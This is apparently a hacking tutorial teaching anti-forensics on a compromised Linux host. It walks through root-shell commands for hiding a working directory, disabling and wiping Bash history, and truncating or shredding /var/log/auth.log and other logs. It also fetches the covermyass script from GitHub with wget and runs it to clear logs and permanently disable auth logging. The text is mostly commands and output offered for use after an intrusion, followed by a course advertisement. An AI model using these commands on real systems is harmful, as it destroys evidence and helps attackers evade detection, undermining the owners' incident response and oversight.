The final stage of exploitation is covering your tracks, which involves wiping all activity and logs so the attacker can avoid being detected. It's especially crucial for persistence if the target is going to be accessed again in the future.
To show you the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system.
We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.
After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.
Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:
root@target:/# find / -perm -222 -type d 2>/dev/null /dev/shm /var/lock /var/lib/php5 /var/tmp /var/www/dav /var/www/twiki/data/Sandbox /var/www/twiki/data/Main /var/www/twiki/data/Know /var/www/twiki/data/TWiki /var/www/twiki/data/_default /var/www/twiki/data/Trash /var/www/twiki/pub/Sandbox /var/www/twiki/pub/Main /var/www/twiki/pub/Know /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL /var/www/twiki/pub/TWiki /var/www/twiki/pub/TWiki/TWikiDocGraphics /var/www/twiki/pub/TWiki/TWikiTemplates /var/www/twiki/pub/TWiki/TWikiLogos /var/www/twiki/pub/TWiki/PreviewBackground /var/www/twiki/pub/TWiki/FileAttachment /var/www/twiki/pub/TWiki/WabiSabi /var/www/twiki/pub/Trash /var/www/twiki/pub/icn /tmp /tmp/.ICE-unix /tmp/.X11-unix
We can create a hidden directory with the mkdir command and by prepending the name with a dot:
root@target:/# mkdir /dev/shm/.secret
If we list the contents of /dev/shm now, nothing shows up:
root@target:/# ls -l /dev/shm/ total 0
Only when we use the -a switch to list all files and directories does it show up:
root@target:/# ls -la /dev/shm/ total 0 drwxrwxrwt 3 root root 60 2019-06-19 13:49 . drwxr-xr-x 13 root root 13480 2019-06-19 13:41 .. drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret
And to remove the directory once we are finished on the machine, use the rmdir command:
root@target:/# rmdir /dev/shm/.secret/
Bash keeps a list of commands used in the current session in memory, so it's important to clear it to cover your tracks. We can view the current history with the history command:
root@target:/# history 1 cd / 2 ls 3 find / -perm -222 -type d 2>/dev/null 4 cd /dev/shm/ 5 cd / 6 mkdir /dev/shm/.secret 7 ls -l /dev/shm/ 8 ls -la /dev/shm/ 9 ls 10 rmdir /dev/shm/.secret/ 11 history
Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo it to see the location:
root@target:/# echo $HISTFILE /root/.bash_history
We can use the unset command to remove the variable:
root@target:/# unset HISTFILE
So when we echo it again, nothing shows up:
root@target:/# echo $HISTFILE
We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:
Or do the same with the export command:
root@target:/# export HISTFILE=/dev/null
And the history will now be sent to /dev/null (nowhere):
root@target:/# echo $HISTFILE /dev/null
We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:
Alternatively, use the export command:
root@target:/# export HISTSIZE=0
We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:
Or with export:
root@target:/# export HISTFILESIZE=0
The set command can be used to change shell options as well. To disable the history option, use the following command:
root@target:/# set +o history
And to enable it again:
root@target:/# set -o history
Similarly, the shopt command can be used to change shell options. To disable history, use the following command:
root@target:/# shopt -ou history
And to enable it again:
root@target:/# shopt -os history
While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:
root@target:~# cat /etc/passwd
That technique doesn't work all the time and depends on the system.
We can also just clear the history using the -c switch:
root@target:~# history -c
To make sure the changes are written to disk, use the -w switch:
root@target:~# history -w
That will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:
root@target:/# cat /dev/null > ~/.bash_history && history -c && exit
We can also use the kill command to exit the session without saving history:
root@target:/# kill -9 $$
In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:
- /var/log/auth.log Authentication
- /var/log/cron.log Cron Jobs
- /var/log/maillog Mail
- /var/log/httpd Apache
Of course, we can simply remove a log with the rm command:
root@target:/# rm /var/log/auth.log
But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:
root@target:/# truncate -s 0 /var/log/auth.log
Please note, truncate is not always present on all systems.
We can accomplish the same thing by echoing nothing into the file:
root@target:/# echo '' > /var/log/auth.log
And also with > by itself to empty the file:
root@target:/# > /var/log/auth.log
We can also send it to /dev/null:
root@target:/# cat /dev/null > /var/log/auth.log
Or use the tee command:
root@target:/# true | tee /var/log/auth.log
We can also use the dd command to write nothing to the log file:
root@target:/# dd if=/dev/null of=/var/log/auth.log 0+0 records in 0+0 records out 0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s
The shred command can be used to overwrite a file with meaningless binary data:
root@target:/# shred /var/log/auth.log
We can even tack on -zu which will truncate the file and overwrite it with zeros to hide evidence of shredding:
root@target:/# shred -zu /var/log/auth.log
To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that will automate much of the processes we've already covered, including clearing log files and disabling Bash history.
We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):
root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
Head to a writable directory, and use chmod to make it executable:
root@target:/tmp# chmod +x covermyass
Then we can run it:
root@target:/tmp# ./covermyass Welcome to Cover my ass tool ! Select an option : 1) Clear logs for user root 2) Permenently disable auth & bash history 3) Restore settings to default 99) Exit tool >
We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:
> 1 [+] /var/log/messages cleaned. [+] /var/log/auth.log cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.
We can also disable Bash and auth history with option 2:
> 2 [+] Permanently sending /var/log/auth.log to /dev/null [+] Permanently sending bash_history to /dev/null [+] Set HISTFILESIZE & HISTSIZE to 0 [+] Disabled history library Permenently disabled bash log.
And in case you need to clear everything in a hurry, simply append now to the command:
root@target:/tmp# ./covermyass now [+] /var/log/messages cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.
Today, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.
Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Other worthwhile deals to check out: